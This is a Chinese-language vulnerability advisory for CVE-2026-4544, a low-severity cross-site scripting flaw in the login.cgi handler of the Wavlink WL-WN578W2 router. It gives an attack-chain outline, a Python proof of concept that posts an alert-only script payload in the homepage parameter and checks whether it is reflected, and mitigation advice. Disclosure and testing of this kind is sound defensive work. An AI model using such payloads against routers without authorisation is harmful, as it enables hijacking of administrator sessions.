CVE-2026-4544 Wavlink路由器XSS漏洞

漏洞信息

漏洞编号

CVE-2026-4544

漏洞类型

跨站脚本攻击 (XSS)

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

Wavlink WL-WN578W2

漏洞概述

Wavlink WL-WN578W2路由器固件版本221110被发现存在一处跨站脚本（XSS）漏洞。该漏洞位于/cgi-bin/login.cgi组件的POST请求处理逻辑中，主要原因是未对homepage、hostname等参数进行充分过滤。攻击者可利用此缺陷，通过构造恶意参数发起远程攻击。尽管利用需要高权限和用户交互，但鉴于漏洞细节已公开且厂商未予修复，管理员需警惕潜在的会话劫持风险。

技术细节

该漏洞属于反射型或存储型跨站脚本攻击（根据参数名推测可能为反射型），源于Wavlink WL-WN578W2设备Web管理接口对用户输入的信任处理机制失效。具体技术细节显示，受影响文件`/cgi-bin/login.cgi`在处理POST请求时，直接接收并处理了`homepage`、`hostname`及`login_page`参数，而未对这些参数进行HTML实体编码或基于白名单的过滤。这使得攻击者能够将任意的HTML标签和JavaScript代码注入到HTTP请求中。根据CVSS向量（AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N），攻击场景通常涉及社会工程学：攻击者首先需要诱导具有高权限（即管理员身份）的用户访问包含恶意payload的链接。一旦管理员在保持登录状态的情况下触发该请求，注入的脚本便会在其浏览器环境中执行。这可能导致管理员会话Cookie被盗取（完整性影响），进而通过劫持的会话完全控制路由器的管理后台，篡改路由配置或进一步渗透内网。

攻击链分析

STEP 1

侦察阶段

攻击者确认目标设备为Wavlink WL-WN578W2且固件版本为221110。

STEP 2

构造攻击载荷

攻击者编写包含恶意JavaScript代码的HTML/Script片段，准备注入到homepage等参数中。

STEP 3

诱导交互

攻击者向管理员发送包含恶意构造的POST请求链接（可能通过钓鱼邮件或恶意网页），诱导管理员点击。

STEP 4

执行攻击

管理员浏览器向设备发送请求，设备将未过滤的恶意脚本返回给浏览器并执行，窃取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_xss_vulnerability(target_ip):
    """
    PoC for CVE-2026-4544
    This script checks if the target is vulnerable to XSS in the login.cgi endpoint.
    """
    url = f"http://{target_ip}/cgi-bin/login.cgi"
    
    # Payload attempting to execute JavaScript
    xss_payload = "<script>alert('CVE-2026-4544_XSS');</script>"
    
    # Vulnerable parameters mentioned in the description
    data = {
        "homepage": xss_payload,
        "hostname": "test_host",
        "login_page": "test_page"
    }
    
    try:
        response = requests.post(url, data=data, timeout=5)
        
        # Check if the payload is reflected in the response without encoding
        if xss_payload in response.text:
            print(f"[+] Target {target_ip} is vulnerable to CVE-2026-4544.")
            print(f"[+] Payload reflected in response.")
        else:
            print(f"[-] Target {target_ip} does not appear to be vulnerable or payload was filtered.")
    except Exception as e:
        print(f"Error connecting to target: {e}")

if __name__ == "__main__":
    target = "192.168.10.1" # Replace with actual target IP
    check_xss_vulnerability(target)

影响范围

Wavlink WL-WN578W2 221110

防御指南

临时缓解措施

鉴于厂商目前未响应且无补丁发布，建议用户仅通过本地网络访问路由器管理界面，切勿将Web管理端口暴露在公网。同时，建议在完成必要配置后注销登录 session，避免长时间保持登录状态。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4544
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4544
3 Details https://www.cvedetails.com/cve/CVE-2026-4544/
4 VulDB https://vuldb.com/cve/CVE-2026-4544
5 Link https://github.com/Litengzheng/vul_db/blob/main/WL-WN578W2/vul_6/README.md
6 Link https://github.com/Litengzheng/vul_db/blob/main/WL-WN578W2/vul_7/README.md
7 Link https://vuldb.com/?ctiid.352361
8 Link https://vuldb.com/?id.352361
9 Link https://vuldb.com/?submit.774692
10 Link https://vuldb.com/?submit.774693
11 Link https://vuldb.com/?submit.774696